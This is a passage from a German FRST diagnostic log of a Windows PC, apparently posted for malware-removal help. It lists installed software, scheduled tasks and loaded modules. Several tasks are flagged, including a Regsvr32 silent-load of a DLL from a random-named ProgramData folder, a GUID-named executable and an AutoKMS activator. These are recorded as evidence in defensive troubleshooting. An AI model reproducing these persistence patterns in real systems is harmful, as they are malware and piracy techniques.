2.8.2.0 - ASUSTek COMPUTER INC.) Hidden Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Besiege (HKLM-x32\...\Steam App 346010) (Version: - Spiderling Studios) Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender) Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender) Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.) Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.) Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.) Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.) Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version: - *Canon Inc.) Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.) 
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.) Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization BR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization DA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization FI (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) 
Hidden Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) 
Hidden Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive) CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World) Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.) Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.) Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - ) ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen) EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc) Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version: - Ubisoft) Ghostery (HKLM-x32\...\Ghostery) (Version: - Ghostery Inc) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.) Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) 
Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation) JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH) Malwarebytes Version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes) Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 
11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation) Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation) Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft) Mozilla Firefox 53.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.3 (x86 de)) (Version: 53.0.3 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.3.6347 - Mozilla) Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.) 
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek) Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.) Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.) Sacred 3 (HKLM-x32\...\Steam App 247950) (Version: - Keen Games) Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics) Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.) Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung) SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts) Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.) Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) 
Hidden Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB) Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB) StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version: - Ubisoft) Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb) Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft) Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.) Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.) Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment) Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation) WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH) WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH) WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. 
Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2017-05-22 18:25 - 2017-05-09 16:38 - 02270672 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2010-07-15 06:44 - 2010-07-15 06:44 - 00020032 _____ ()
C:\Program Files\Unlocker\UnlockerCOM.dll 2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll 2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll 2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll 2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll 2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe 2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll 2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll 2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll 2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe 2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files 